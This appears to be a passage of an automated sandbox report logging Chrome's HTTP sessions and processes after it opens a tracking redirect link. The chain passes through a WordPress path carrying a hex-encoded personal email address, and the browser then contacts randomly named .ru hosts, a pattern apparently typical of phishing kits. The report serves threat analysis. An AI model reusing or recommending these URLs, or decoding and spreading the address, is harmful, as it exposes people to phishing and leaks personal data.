                                                                          2025-01-14 21:50:44 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1007293128:1736889469:3tFZVfEdHPgvRe4lFj_YIENTci-pgZz_bRcHbKlmagY/9020d7826b0a4252/5oMQoLsc2iOSixT_.cVI8XgYxH9viTIw7cmt1hNSqfE-1736891428-1.1.1.1-EcOzoDxYUj5Kq8T8UJb37UVA.AmT90LxN48yVCYD0ckCIbW51Z93jUI_qQzBlJ5Q HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:44 UTC442INHTTP/1.1 400 Bad Request
                                                                          Date: Tue, 14 Jan 2025 21:50:44 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 14
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: WKfQWfze3sfcdo2ehDkIn3R3nt1JTYAuSjvcpAO7ePjQ8lUUz3EyFCUsOQVCpipyRgMT9biKL8EAVnNzg7Kw0w==$xaLCO10yw8PlIgOqXssk6Q==
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7e96f89c337-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2025-01-14 21:50:44 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                          Data Ascii: {"err":100230}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          29192.168.2.449783188.114.97.34434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:45 UTC642OUTGET /UEaVhvAGqbXXRrxZgwkVGIAFMLJFCKDBJATYTKVUYGKYOKYGELQQ HTTP/1.1
                                                                          Host: ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://wv.bomirax.ru
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://wv.bomirax.ru/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:45 UTC885INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:45 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGPIGIe61sTEz6yvwno8pL5q9TxQsdLyDXTmlgytdufR03MayDky3%2F7VjVPdyreqGX94h9NEDIAPKuJQywzSFAVLS7dsXrtGBPQjNgkJTDQrzIHvuMu2qKzsyeEvhlSKTpAkU25WrSoohV663rqmPrfa968re9gtWqvwzFOxX70X8kC70O69xmm9An9lDah6p4L6CfI%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7edbecc4bb9-YUL
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=17754&min_rtt=17752&rtt_var=6661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1220&delivery_rate=164312&cwnd=32&unsent_bytes=0&cid=da4fda5636f88fc8&ts=709&x=0"
                                                                          2025-01-14 21:50:45 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                          Data Ascii: 11
                                                                          2025-01-14 21:50:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          30192.168.2.449786188.114.97.34434008C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-14 21:50:46 UTC442OUTGET /UEaVhvAGqbXXRrxZgwkVGIAFMLJFCKDBJATYTKVUYGKYOKYGELQQ HTTP/1.1
                                                                          Host: ozniouyw1ohpamkudf3szxjee1d5tc4cbcooevk3tmcqsteggki0ky.deryposi.ru
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2025-01-14 21:50:47 UTC901INHTTP/1.1 200 OK
                                                                          Date: Tue, 14 Jan 2025 21:50:47 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Access-Control-Allow-Origin: *
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e49uC11a1LDEvyprpYZEcFnsJ8WA8RlVTL0QcilSl1AQucuxXsDSrZljzEu7sPhXEY9k5FJZT59wEUsN%2F6fo8z6hZRrr1iG7jTaZ14S9SS0Z%2FD%2F5kkSlB%2B%2F45F%2FOYaDTETqLh6TlPWUOwnl1ArAwthDgyCUxcgN1glSMW3h%2Fg1eLJ59ym0Ozus%2FLyroP5%2FdPY%2BleT14%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 9020d7f5be2b8793-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9256&min_rtt=8689&rtt_var=4393&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1020&delivery_rate=220743&cwnd=32&unsent_bytes=0&cid=4eae5a9d260fd50f&ts=663&x=0"
                                                                          2025-01-14 21:50:47 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                          Data Ascii: 11
                                                                          2025-01-14 21:50:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:16:50:10
                                                                          Start date:14/01/2025
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:2
                                                                          Start time:16:50:13
                                                                          Start date:14/01/2025
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 --field-trial-handle=2224,i,10226237181688976301,14341506509442176442,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:3
                                                                          Start time:16:50:19
                                                                          Start date:14/01/2025
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://emp.eduyield.com/el?aid=962445be-3c17-11ec-9620-0e45aa61dde5&cid=497&dest=https://google.com/amp/avrancecorp.com/wp-web/Griffinwink/64616b6f74616c796e6e406772696666696e77696e6b2e636f6d/$ZGFrb3&pid=564628&rid=68730789"
                                                                          Imagebase:0x7ff76e190000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          No disassembly